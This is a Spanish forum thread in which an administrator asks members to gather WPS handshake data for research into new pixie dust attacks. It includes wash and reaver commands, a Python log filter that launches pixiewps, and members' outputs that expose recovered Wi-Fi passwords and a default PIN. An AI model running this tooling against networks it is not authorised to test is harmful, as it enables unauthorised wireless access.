Colabora con datos a la investigación sobre nuevos ataques en pixiewps (Pagina 1) / Estudio de algoritmos y recopilación de PIN genéricos / Foro Wifi-libre.com

El libre pensamiento para un internet libre

No estas registrado.     

Anuncio

Wifi-libre.com: El libre pensamiento para un internet libre / Regístrese ahora

#1 12-11-2017 19:45:58

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 3,618

Colabora con datos a la investigación sobre nuevos ataques en pixiewps

¡Llamada al pueblo wifi-liberatrio! Se necesitan datos de Punto de Acceso no soportados por pixiewps para introducir nuevos modos ataques

revolucion_pixiewps_1.jpg

¿Cómo recoger los datos pertinentes para el estudio de nuevos modos de ataques pixie dust?

¡Hola [email protected]!
  Les he comentado en el tema sobre pixiewps que se necesitan datos para poder investigar aquellos Puntos de acceso que no son vulnerables a los modos de ataques conocidos y ya implementados en pixiewps.
Wiire ha abierto un hilo en el foro kali linux para pedir colaboración y hago lo mismo aquí.
  La mayoría de [email protected] vivimos en España y creo que nos interesa mucho estudiar el caso de estos numerosos chipset Broadcom que tenemos alrededor
Existe un modo para broadcom pero funciona con otra generación de chipset y nunca se ha conseguido llevar con éxito un ataque pixie dust sobre uno de estos PA con chipset Broadcom empleado por los ISP ibéricos.
 
  Los datos no son para estudiar el algoritmo de generación del PIN o para recoger PINes genéricos.
  Es para estudiar el cifrado del WPS, todo lo relativo a la construcción de los mensajes M.
  No basta con mandar una pegatina del routeur, Ni hace falta.
  r0flor ha hecho un pequeño script para automatizar el proceso.
  Les enseño ahora cómo se hace.
   Gracias de ante mano a [email protected] smile

  Para obtener los datos útiles se debe:

  1. Pillar una respuesta PROBE de nuestro router con wash y la opción -j.

  2. Efectuar un ataque con el PIN valido y el modo -vvv (salida máxima) de reaver

  3. Pasar el log de reaver por un script que tenéis más abajo para extraer los datos

No se asusten,  Es muy fácil y rápido, tres lineas de ordenes. 
  Se debe hacer con reaver 1.6.3 (o cualquier revisión/versión superior a la 1.6.3.) para poder emplear el "nuevo" argumento -vvv (ver:  )
 

1. La respuesta probe

Acabo de encender el router para testeo y no me sé ni su nombre, ni su canal.
Hago primero un escaneo con wash "normal" para pilar rápido su nombre y su canal.

sudo wash -i wlan1mon

Tengo el canal de mi PA y su bSSID y nombre
Ahora pillamos la probe

sudo wash -i wlan1mon -b 00:C0:CA:78:B1:37 -s -n 100 -j -c 13 | grep -i '00:C0:CA:78:B1:37' 

revolucion_pixiewps_2.jpg

Comparando con la sintaxis básica para wash:
- Hemos añadido -j (para obtener los "parámetros WPS extendidos" )
- Hemos añadido -s (escaneo profundo) y -n 100 (mandamos 100 preguntas PROBE a cada PA detectado)
- Hemos añadido el canal para ahorrar mucho tiempo
- Y tenemos a un pipe con grep para obetner en cnsola solo los datos de nuestro PA.
Cuando los datos aparecen paramos el escaneo con wash
Es inmediato si estamos cerca de nuestro PA.
Copilamos el contenido de la respuesta y lo pegamos en un archivo de texto que guardamos.
Este fichero es el que vais a pasarnos. No es muy importante pero si ponéis como nombre el nombre del modelo del PA o algo así, mejor.
En ejemplo llamaré el mio AIP-W525Hv2_AlfaNetwork.txt

2. Mandar el PIN

Lo de siempre: Usar la opción -p seguida del PIN del dispositivo. Se debe además usar el modo de "verbose" máximo (-vv).
Mandaremos gracias a un pipe y el comando tee un duplicado de la salida en los archivos temporales.

(sudo) reaver -vvv -i <interfaz> -b <Bssid> -p <PIN> -c <canal> 2>&1 | tee /tmp/reaver.log

En ejemplo:

sudo reaver -i wlan1mon -c 13 -b 00:C0:CA:78:B1:37 -vvv -p 07760891 | tee /tmp/reaver.log

revolucion_pixiewps_3.jpg

3. Preparar los datos a mandar

Una vez la llave obtenida vamos a depurar la salida de reaver guardada en los archivos temporales.
Se hace con el script logfilter.py que hemos incluido en reaver.
Lo dejo aquí para que podáis copiar lo y pegarlo para usarlo.

#!/usr/bin/env python2

# this is a filter meant to be used with a logfile containing
# debug output from wpa_supplicant or reaver, which extracts
# cryptographic values of interest and tries to run pixiewps
# with them. input is passed on stdin.

import sys, os

class Data():
	def __init__(self):
		self.pke = ''
		self.pkr = ''
		self.e_hash1 = ''
		self.e_hash2 = ''
		self.authkey = ''
		self.e_nonce = ''
		self.e_snonce1 = ''
		self.e_snonce2 = ''
		self.wpa_psk = ''

	def __repr__(self):
		return \
			"pke = " + self.pke + "\n" \
			"pkr = " + self.pkr + "\n" \
			"e_hash1 = " + self.e_hash1 + "\n" \
			"e_hash2 = " + self.e_hash2 + "\n" \
			"authkey = " + self.authkey + "\n" \
			"e_nonce = " + self.e_nonce + "\n" \
			"e_snonce1 = " + self.e_snonce1 + "\n" \
			"e_snonce2 = " + self.e_snonce2 + "\n" \
			"wpa_psk = " + self.wpa_psk + "\n"

def process_wpa_supplicant_line(data, line):
	def get_hex(line):
		a = line.split(':', 3)
		return a[2].replace(' ', '')

	if line.startswith('WPS: '):
		if 'Enrollee Nonce' in line and 'hexdump' in line:
			data.e_nonce = get_hex(line)
			assert(len(data.e_nonce) == 16*2)
		elif 'DH own Public Key' in line and 'hexdump' in line:
			data.pkr = get_hex(line)
			assert(len(data.pkr) == 192*2)
		elif 'DH peer Public Key' in line and 'hexdump' in line:
			data.pke = get_hex(line)
			assert(len(data.pke) == 192*2)
		elif 'AuthKey' in line and 'hexdump' in line:
			data.authkey = get_hex(line)
			assert(len(data.authkey) == 32*2)
		elif 'E-Hash1' in line and 'hexdump' in line:
			data.e_hash1 = get_hex(line)
			assert(len(data.e_hash1) == 32*2)
		elif 'E-Hash2' in line and 'hexdump' in line:
			data.e_hash2 = get_hex(line)
			assert(len(data.e_hash2) == 32*2)
		elif 'Network Key' in line and 'hexdump' in line:
			data.wpa_psk = get_hex(line).decode('hex')
		elif 'E-SNonce1' in line and 'hexdump' in line:
			data.e_snonce1 = get_hex(line)
			assert(len(data.e_snonce1) == 16*2)
		elif 'E-SNonce2' in line and 'hexdump' in line:
			data.e_snonce2 = get_hex(line)
			assert(len(data.e_snonce2) == 16*2)

def got_all_pixie_data(data):
	return data.pke and data.pkr and data.e_nonce and data.authkey and data.e_hash1 and data.e_hash2

def get_pixie_cmd(data):
	return "pixiewps --pke %s --pkr %s --e-hash1 %s --e-hash2 %s --authkey %s --e-nonce %s" % \
		(data.pke, data.pkr, data.e_hash1, data.e_hash2, data.authkey, data.e_nonce)

if __name__ == '__main__':

	data = Data()

	while True:
		line = sys.stdin.readline()
		if line == '': break
		process_wpa_supplicant_line(data, line.rstrip('\n'))

	print data

	if got_all_pixie_data(data):
		pixiecmd = get_pixie_cmd(data)

		print "running %s" % pixiecmd
		os.execlp('/bin/sh', '/bin/sh', '-c', pixiecmd)

Ejecutamos el script en pipe para trabajar la salida duplicada

cat /tmp/reaver.log | python2 /ruta/hacía/logfilter.py 

Ejemplo

cat /tmp/reaver.log | python2 /home/kcdtv/Reaver/reaver-wps-fork-t6x/tools/logfilter.py

Copiamos el resultado para pegar lo en nuestro archivo.

revolucion_pixiewps_5.jpg

Luego me mandáis el archivo o lo peguéis aquí mismo pero si lo hacéis así no olvidaros de editar el final del bssid y del essid para vuestro anonimato.
Cualquier duda o pregunta... ¡El hilo está abierto para esto!
También lo está para recoger datos... wink ¡Hasta pronto!

Desconectado

Anuncio

Wifi-highpower.es es distribuidor oficial de Alfa Network

#2 13-11-2017 14:39:39

cjrs
Usuario

Registrado: 14-01-2016
Mensajes: 26

Re: Colabora con datos a la investigación sobre nuevos ataques en pixiewps

Hola kcdtv, muchos queremos colaborar pero no tenemos tu nivel, o no tenemos mucho tiempo o la paciencia tambien es necesaria, lo que yo propongo, es todos esos pasos que hay que dar: exploracion de redes, recogida de parametros extendidos del WPS, pasarlo por un filtro en Python, guardarlo en un fichero, etc etc, ¿no seria mejor el tener un solo script que lo ejecutas, eliges la red a auditar y al final te de todo lo que necesitais Wiire y tu?.

No quiero ofender a nadie, pero lo mismo que hay muchos otros scripts que hacen un monton de cosas como por ejemplo el de Airgeddon, Wifimosys, Linset o Fluxion, pues pienso que estaria bien tener un solo script que haga todo eso que se necesita para la recogida de datos y cualquiera que sea nuevo en esto y quiera colaborar, pues tan solo tenga que ejecutar ese script, elegir la red y que al final el fichero que te muetre por pantalla y el resultado final te lo guarde en cierto sitio (por ejemplo: /root/recogidatoswps.txt y solo tenga que enviaroslo por email, asi seria muy facil y rapido para todos el poder colaborar.

Por ejemplo, Patcher programo la pedazo aplicacion para Windows: Wireless Air Cut y ya desde la version 1.5 incorpora la opcion de:

("Se ha añadido un boton en la ventada de Ap's Auditados para que, quien quiera, pueda reportar la información de sus redes para colaborar con el descubrimiento de nuevas vulnerabilidades.Este ultimo punto es muy interesante para toda la comunidad por dos cuestiones. por un lado, por que servirá para, cruzando la información de cada aporte, poder descubrir nuevas vulnerabilidades y en segundo lugar, por que abre el camino a una nueva era encuanto a la detección, más fiable, de Ap's. basado en el modelo y no solo en la dirección MAC como hasta ahora y para ello, es fundamental tener una basta biblioteca, con la información de modelo que figura en los mensajes probe que envian los Ap. Agradezco de antemano vuestra colaboración. No cuesta nada hacerlo, solo hay que pulsar el boton con la flecha verde y waircut se encarga de todo.")

compartir los informes de las redes auditadas para nuevas investigaciones, pienso que de una forma similar a como haceis Wiire y tu, no digo que el script se ejecute todo en modo grafico pero si que no tengamos que dar tantos pasos y de alguna manera lo automatices todo lo necesario en un solo script para que todo sea mas facil y rapido.

Por favor no te lo tomes a mal, tan solo es una opinion que doy. Gracias

Ultima edición por cjrs (13-11-2017 15:00:46)

Desconectado

#3 13-11-2017 18:57:52

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 3,618

Re: Colabora con datos a la investigación sobre nuevos ataques en pixiewps

No veo porque me lo tomaría a mal... big_smile
Esto sí: No estoy de acuerdo para nada ni comparto tú modo de ver las cosas. .
Se trata de aprender y entender haciendo las cosas. Siempre (aquí).
Entrar lineas de ordenes  wash/reaver y ejecutar un script es la base para los usuarios de distribuciones GNU Linux (nuestro foro se centra en ellas) y de forma general para cualquiera (windows o no) que quiere iniciarse al mundo del hacking.
  Si uno no lo sabe hacer es hora de aprender los fundamentos y el foro está aquí para los ayudarlos.

Desconectado

#4 14-11-2017 04:13:31

Fisgon
Usuario

Registrado: 27-10-2016
Mensajes: 24

Re: Colabora con datos a la investigación sobre nuevos ataques en pixiewps

Estoy un poco confundido, respecto a esto:

kcdtv

La mayoría de [email protected] vivimos en España y creo que nos interesa mucho estudiar el caso de estos numerosos chipset Broadcom que tenemos alrededor.
Existe un modo para broadcom pero funciona con otra generación de chipset y nunca se ha conseguido llevar con éxito un ataque pixie dust sobre uno de estos PA con chipset Broadcom empleado por los ISP ibéricos.

¿Eso excluye a los puntos de acceso con Broadcom fuera de España?

Poseo un TG582n de Telmex (Mexico).  ¿Les sirve la información de este punto de acceso?

Saludos!

Desconectado

#5 14-11-2017 10:29:46

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 3,618

Re: Colabora con datos a la investigación sobre nuevos ataques en pixiewps

¡Hola!

¿Eso excluye a los puntos de acceso con Broadcom fuera de España?

Para nada amigo Fisgon. smile
   Nos interesa cualquier punto de acceso no soportado actualmente por pixiewps.
   Saludos smile

Desconectado

#6 09-01-2018 00:00:52

troh
Usuario

Registrado: 12-11-2017
Mensajes: 19

Re: Colabora con datos a la investigación sobre nuevos ataques en pixiewps

A ver si lo hice bien:

[email protected]:~# cat /tmp/reaver.log | python2 logfilter.py 
pke = f3d3801bb8f7000174bb3f8ddcbc17ee5fe10ec5c3ad234329adb6bc7b978486a2ed20f95aa672641d51b9da7b5de8349ba33605f16cc48c543774edd3369ee4cc08e492c6ed0fe1f1c4b836bb9d03970189ff62ce2e3f381e8dfbf1859dafb51699ad51d503d8c377f2008c7e020977ef31583313da3e35b46777ff04605ffee50bffa2e3fd0686c1b7f8bd1ba5d945c7e4d28e2099664bb3620d66cced116bd85cfb7b1f46c97caee100f1e9706b6922bf19d8e742673061cbf6ad9e4e4484
pkr = 984acf84c1be94de3b3c89a1673557a49f6b72c93d09bbfbf1e9dc3c8ff260f3a50cdeaaf4701ccdf3df903222ccf9ed79e00183ef1e4a52e2d564f7a9260afef7a82e1f2435862185be5373d3ce1327a52588f8dd7961c76f6fd99574f21fca5e2d882ade54ffefe0f35d437dd8d65a9bcd9f0b6ccbbefa18b9ec892d45b365171750a1bcd9a04ced46f77db0a948529487ffdbaccf527f7626f9b990eec16b4fa826fee6bbc5aef70dfb9ab0824baafd767281f58c3623136ffa0c5a4533be
e_hash1 = 3fcfc03e8b40e3b4fe6054befd57f5de88302162d93d901d602b29258635f1c7
e_hash2 = 6305aa117903f8a570fe356724769ebfb6f844c5b2e70203b23ee568a3bd9263
authkey = 8ce4693f218bb6a98853e955fd71b35b2b24aa28c74499911221676672eb0768
e_nonce = 6fe34f8be48308418d5eb898cc71f28f
e_snonce1 = b2c21c840ddd3766025b5b4dcf99347a
e_snonce2 = 24df6b99fc751d5b5c138d52dff58b7b
wpa_psk = 5dCPU

running pixiewps --pke f3d3801bb8f7000174bb3f8ddcbc17ee5fe10ec5c3ad234329adb6bc7b978486a2ed20f95aa672641d51b9da7b5de8349ba33605f16cc48c543774edd3369ee4cc08e492c6ed0fe1f1c4b836bb9d03970189ff62ce2e3f381e8dfbf1859dafb51699ad51d503d8c377f2008c7e020977ef31583313da3e35b46777ff04605ffee50bffa2e3fd0686c1b7f8bd1ba5d945c7e4d28e2099664bb3620d66cced116bd85cfb7b1f46c97caee100f1e9706b6922bf19d8e742673061cbf6ad9e4e4484 --pkr 984acf84c1be94de3b3c89a1673557a49f6b72c93d09bbfbf1e9dc3c8ff260f3a50cdeaaf4701ccdf3df903222ccf9ed79e00183ef1e4a52e2d564f7a9260afef7a82e1f2435862185be5373d3ce1327a52588f8dd7961c76f6fd99574f21fca5e2d882ade54ffefe0f35d437dd8d65a9bcd9f0b6ccbbefa18b9ec892d45b365171750a1bcd9a04ced46f77db0a948529487ffdbaccf527f7626f9b990eec16b4fa826fee6bbc5aef70dfb9ab0824baafd767281f58c3623136ffa0c5a4533be --e-hash1 3fcfc03e8b40e3b4fe6054befd57f5de88302162d93d901d602b29258635f1c7 --e-hash2 6305aa117903f8a570fe356724769ebfb6f844c5b2e70203b23ee568a3bd9263 --authkey 8ce4693f218bb6a98853e955fd71b35b2b24aa28c74499911221676672eb0768 --e-nonce 6fe34f8be48308418d5eb898cc71f28f

 Pixiewps 1.4

 [-] WPS pin not found!

 [*] Time taken: 6 s 719 ms

Ultima edición por troh (09-01-2018 00:01:03)

Desconectado

#7 09-01-2018 15:10:22

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 3,618

Re: Colabora con datos a la investigación sobre nuevos ataques en pixiewps

¡Perfecto! Gracias smile

Desconectado

#8 10-01-2018 12:57:59

troh
Usuario

Registrado: 12-11-2017
Mensajes: 19

Re: Colabora con datos a la investigación sobre nuevos ataques en pixiewps

device: VMG1312-B10B chip broadcom de acuerdo a wash.

[email protected]:~# cat /tmp/reaver.log | python2 logfilter.py 
pke = 93f03ddd4001ddbeb69bd89a01336de10ef535dde0a7c68fa1de920eb96568a8afce2f825cd2b4c113574803fa8b19b7241a6f23cc2478bf1eb1f2df1306f71886726f07a09dadc58487d71c7be8f8cc530d0557cc9d13aed3bcdb21682ef85a63d73ddbe906877fbf584112687843c3a3c40ddb73782b7662cbe74abd0040262d5f204d4c7562d7ae405ce98300b671b346dd5055c40080955622616b1ea02afdc7c73fed69596ae3d6ac70d27e3ad7cc8469c4611b8a1d494e2fa3f59ed8b7
pkr = f5d3b7bf8c900823304e13a9395f00b28c70dfd3e0f3cdd02e00b99ad2365d10300da3b7f0835bf11fa816bbe2898321d896d6461a06cb71f41c3175b7cffbddf4f46076e9bebdb5321d683e2f72ea64bc9a12881b537a5d9b4160c3e8409968a163a2cc8129105e2d24608baab1f1b59ffcb223bd352d2d2f8777d4f40ecb47d31761f3659a3c19965def168b025dcb5b1f60d3e338cb997cc9f2959b1c1a653afe89b4f9ddf77c25b11d1ed0cf7b68715bab3f75fc7f26b96903370498a2d3
e_hash1 = 9ba5e32c88bcbfc5e22100a7fe0ae633e1a4d4fc05e9cf7e4dd461e9aac8650c
e_hash2 = 29e53322c667c5e112573339c369f9b1ebadd6cda305674a86a5f4e3a6532e48
authkey = 6f809fc34b82d30205a4453f8a6a0f6af0c602714ef19666248b0321af2c6d1b
e_nonce = fd6683ca2c1bb8ce3e8eefa2b48c6a04
e_snonce1 = f58b5670a29097f3560421a4caef79db
e_snonce2 = 9802d74ada087e79463d3c8df4a669dc
wpa_psk = DE562F3DC1

running pixiewps --pke 93f03ddd4001ddbeb69bd89a01336de10ef535dde0a7c68fa1de920eb96568a8afce2f825cd2b4c113574803fa8b19b7241a6f23cc2478bf1eb1f2df1306f71886726f07a09dadc58487d71c7be8f8cc530d0557cc9d13aed3bcdb21682ef85a63d73ddbe906877fbf584112687843c3a3c40ddb73782b7662cbe74abd0040262d5f204d4c7562d7ae405ce98300b671b346dd5055c40080955622616b1ea02afdc7c73fed69596ae3d6ac70d27e3ad7cc8469c4611b8a1d494e2fa3f59ed8b7 --pkr f5d3b7bf8c900823304e13a9395f00b28c70dfd3e0f3cdd02e00b99ad2365d10300da3b7f0835bf11fa816bbe2898321d896d6461a06cb71f41c3175b7cffbddf4f46076e9bebdb5321d683e2f72ea64bc9a12881b537a5d9b4160c3e8409968a163a2cc8129105e2d24608baab1f1b59ffcb223bd352d2d2f8777d4f40ecb47d31761f3659a3c19965def168b025dcb5b1f60d3e338cb997cc9f2959b1c1a653afe89b4f9ddf77c25b11d1ed0cf7b68715bab3f75fc7f26b96903370498a2d3 --e-hash1 9ba5e32c88bcbfc5e22100a7fe0ae633e1a4d4fc05e9cf7e4dd461e9aac8650c --e-hash2 29e53322c667c5e112573339c369f9b1ebadd6cda305674a86a5f4e3a6532e48 --authkey 6f809fc34b82d30205a4453f8a6a0f6af0c602714ef19666248b0321af2c6d1b --e-nonce fd6683ca2c1bb8ce3e8eefa2b48c6a04

 Pixiewps 1.3

 [-] WPS pin not found!

 [*] Time taken: 0 s 82 ms

Desconectado

#9 10-01-2018 13:05:27

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 3,618

Re: Colabora con datos a la investigación sobre nuevos ataques en pixiewps

¡Visto! Gracias. smile

Desconectado

#10 10-01-2018 15:58:05

troh
Usuario

Registrado: 12-11-2017
Mensajes: 19

Re: Colabora con datos a la investigación sobre nuevos ataques en pixiewps

Me quiero volver chango!
Tengo un Technicolor TG588 (C4:EA:1D), chipset broadcom cuyo default pin es 62059237
Y no le encuentro la vuelta con reaver para traer los datos necesarios con el pass. Probé un montón de flags y quedo muerto al 90.91%.:/:|

Desconectado

#11 10-01-2018 19:32:06

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 3,618

Re: Colabora con datos a la investigación sobre nuevos ataques en pixiewps

Si no te molesta probar así

(sudo) reaver -i <interfaz> -b <bssid> -c <canal> -p <pin> -N -g 1 -vvv

Y copiar y pegar el resultado.
Y si puedes copiar y colar el resultado de

airmon-ng

para saber con chipset trabajas.
gracias de antemano

Desconectado

#12 10-01-2018 19:51:12

troh
Usuario

Registrado: 12-11-2017
Mensajes: 19

Re: Colabora con datos a la investigación sobre nuevos ataques en pixiewps

phy0	wlan0		rt2800usb	Ralink Technology, Corp. RT2870/RT3070

Technicolor DPC3848VE DOCSIS 3.0 Gateway (vendor Atheros según un wash -i wlan0 P)

[email protected]:~# cat /tmp/reaver.log | python2 logfilter.py
pke = b85769168d7c05e83a8260eca8b2eeee8190122ec5f81d351ecdaf9aa884b50804f0f1f1982eea08a92213d6573d9c34063d5791c11dc26cd54cfbdf05c06b584965ac0c88877ee1d10f6eeef03f721e4e22adcfedeeaa63d34de17c8027a442366b5fcf0a7a8430ff9d6713e6858bb805b234dcd21132f79201ad83c1ef62edb7d0e4d4821322db8f01105003abf1fc7711900b2797ab1d6e27bfa82c283aa32d177f12076603bab258f6dcb006d917b7d15574b77bbad2e2d636bba4fd83e4
pkr = 02b021a4f33c768d326382b806914253f145a4358966a8a7e567776db077fb8b00e434a3c6f888a02af744aaf54623b2f190941cc952f88a88432aa8fa82da0bf9f3f129ad71047430a891df2099cb953002710b4ac009b7dc78f15e1a28dd39cef3e57440cc2e610626218fcdafbefdc544c115e77ab3e62d35ab221b036031d3882cb77336fbffb97a667a26be16ff35389bcc88702196ab130d2d0921387d2f7c2c12e538d3e529880681f6b6341e69c429e84c5619a1a947cca2fec562a0
e_hash1 = 0fd5dbb8f1d093845ea9b6de0d1b392852b415e244d2c1e62bb5644b586cbc3a
e_hash2 = 44a1b0d6881156df26e2ceaf154e6b2b58f84e3a834fb5445f6804a479224590
authkey = 0b6413766d98a0ecd285ae8f2e023fc910a38882a3146bf4459fa279963a0ad9
e_nonce = ab090be5bc74ee409b2dac6009fdd9ff
e_snonce1 = 9fe79847b2f10cb3e06841b26f039cc8
e_snonce2 = 10e14bdc441978ee1008e7a7ee3486ae
wpa_psk = PAULINADELVALLE2015

running pixiewps --pke b85769168d7c05e83a8260eca8b2eeee8190122ec5f81d351ecdaf9aa884b50804f0f1f1982eea08a92213d6573d9c34063d5791c11dc26cd54cfbdf05c06b584965ac0c88877ee1d10f6eeef03f721e4e22adcfedeeaa63d34de17c8027a442366b5fcf0a7a8430ff9d6713e6858bb805b234dcd21132f79201ad83c1ef62edb7d0e4d4821322db8f01105003abf1fc7711900b2797ab1d6e27bfa82c283aa32d177f12076603bab258f6dcb006d917b7d15574b77bbad2e2d636bba4fd83e4 --pkr 02b021a4f33c768d326382b806914253f145a4358966a8a7e567776db077fb8b00e434a3c6f888a02af744aaf54623b2f190941cc952f88a88432aa8fa82da0bf9f3f129ad71047430a891df2099cb953002710b4ac009b7dc78f15e1a28dd39cef3e57440cc2e610626218fcdafbefdc544c115e77ab3e62d35ab221b036031d3882cb77336fbffb97a667a26be16ff35389bcc88702196ab130d2d0921387d2f7c2c12e538d3e529880681f6b6341e69c429e84c5619a1a947cca2fec562a0 --e-hash1 0fd5dbb8f1d093845ea9b6de0d1b392852b415e244d2c1e62bb5644b586cbc3a --e-hash2 44a1b0d6881156df26e2ceaf154e6b2b58f84e3a834fb5445f6804a479224590 --authkey 0b6413766d98a0ecd285ae8f2e023fc910a38882a3146bf4459fa279963a0ad9 --e-nonce ab090be5bc74ee409b2dac6009fdd9ff

 Pixiewps 1.4

 [-] WPS pin not found!

 [*] Time taken: 6 s 853 ms

Cuando tenga la oportunidad lo corro nuevamente con el flag -g 1 que me faltó en su momento. wink

Como dato de color, quiero comentar que en Kali me anda mucho mejor con reaver éste chipset ralink que mi otras realtek 8812au o la mismísima rtl8187l.

Ultima edición por troh (10-01-2018 19:56:22)

Desconectado

#13 10-01-2018 20:37:44

crash
Very Important Usuario

Registrado: 25-10-2017
Mensajes: 385
Página Web

Re: Colabora con datos a la investigación sobre nuevos ataques en pixiewps

pero y que mas te da el pin en tu ejemplo? si te da la key directamente,

wpa_psk = PAULINADELVALLE2015

Desconectado

#14 10-01-2018 21:21:19

Patcher
Very Important Usuario

Registrado: 14-01-2016
Mensajes: 430

Re: Colabora con datos a la investigación sobre nuevos ataques en pixiewps

@crash, no es que le de la key directamente sinó que antes ya ha probado con el pin correcto. Debes leer el primer post para entenderlo:

kcdtv escribió:

3. Preparar los datos a mandar

Una vez la llave obtenida vamos a depurar la salida de reaver guardada en los archivos temporales.
Se hace con el script logfilter.py que hemos incluido en reaver.

Desconectado

#15 11-01-2018 19:05:04

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 3,618

Re: Colabora con datos a la investigación sobre nuevos ataques en pixiewps

@ troh: Gracias por los últimos datos pero los he borrado ya que este modelo está soportado por pixiewps.
saludos. (PD: He pasado tus datos a wiire. r0flor y soxrock para estudios. Te dan las grarcias. smile )

Desconectado

#16 12-01-2018 00:34:40

troh
Usuario

Registrado: 12-11-2017
Mensajes: 19

Re: Colabora con datos a la investigación sobre nuevos ataques en pixiewps

No hay problemas!
Te comento que no pude recuperar la pass del technicolor TG588v con los argumentos que me pasaste.

agregar -N -g 1 -vvv

Una pena, el vendor de ese modem es broadcom y me interesan bastante.

Desconectado

#17 12-01-2018 09:30:18

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 3,618

Re: Colabora con datos a la investigación sobre nuevos ataques en pixiewps

Quizá con añadir

-j 

Sino queda la opción de probar con wpa_cli y su modo debugg: Método universal, sin modo monitor, para ataque pixie dust
No te preocupes por lo de depurar los datos, nos apañaremos con el copiado pegado de lo que pasa en consola si lo consigues.
Saludos y gracias por tus esfuerzos. smile

Desconectado

#18 12-01-2018 13:49:09

troh
Usuario

Registrado: 12-11-2017
Mensajes: 19

Re: Colabora con datos a la investigación sobre nuevos ataques en pixiewps

No hubo caso usando wpa_cli tampoco, nunca recibo un M3 y/o superiores.
Adjunto fragmentos de log por si sirve de algo.
https://workupload.com/file/vEjK6kZ

Desconectado

#19 12-01-2018 14:55:06

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 3,618

Re: Colabora con datos a la investigación sobre nuevos ataques en pixiewps

Gracias por intentarlo smile
No recibir el M3 da a pensar que el WPS no está correctamente habilitado-configurado.
Veo 2 explicaciones posibles
  - El WPS está activado sin PIN configurado
  - Intervención del ISP: Aquí en España las empresas de telecomunicaciones se han puesto las pilas y han actualizado los firmware para impedir el crack mediante PIN WPS
El resultado es que consigues asociar, recibes el M2 pero nunca llegas a recibir un M3 (no ataque pixie dust sin M3).

Desconectado

#20 12-01-2018 18:29:51

troh
Usuario

Registrado: 12-11-2017
Mensajes: 19

Re: Colabora con datos a la investigación sobre nuevos ataques en pixiewps

Desde la web config del modem está habilitado. No encontré opción de "configurado" en el admin.html.
Tampoco encontré como cambiarle el pin y eso que miré un par de manuales en línea de éste TG588v.
Por lo que me lleva a pensar lo mismo que vos, que el ISP ya lo protege (lo cual me parece increible viniendo de arnet) o que reaver tiene algún bug o lo que sea que hace que aún poniendo el pin correcto caiga en un loop de errores 0x03 y 0x04.

Desconectado

Anuncio

Wifi-highpower.es es distribuidor oficial de Alfa Network

Temas similares

Tema Respuestas Vistas Ultimo mensaje
0 19 Hoy 02:01:01 por USUARIO VIEJO
Pegado:
Pegado:: Script multiuso wifi para Kali y otras distros por v1s1t0r  [ 1 2 3 10 ]
226 9417 Ayer 22:58:34 por crash
Proyecto Misisipi 3.0 por josep345  [ 1 2 3 9 ]
222 2868 Ayer 21:34:31 por crash
6 491 Ayer 17:42:26 por crash
23 3203 Ayer 15:37:55 por kcdtv

Pie de página

Información del usuario

Ultimo usuario registrado: USUARIO VIEJO
Usuarios registrados conectados: 0
Invitados conectados: 12

Estadisticas de los foros

Número total de usuarios registrados: 853
Número total de temas: 968
Número total de mensajes: 8,947

Máx. usuarios conectados: 69 el 15-10-2017 09:23:21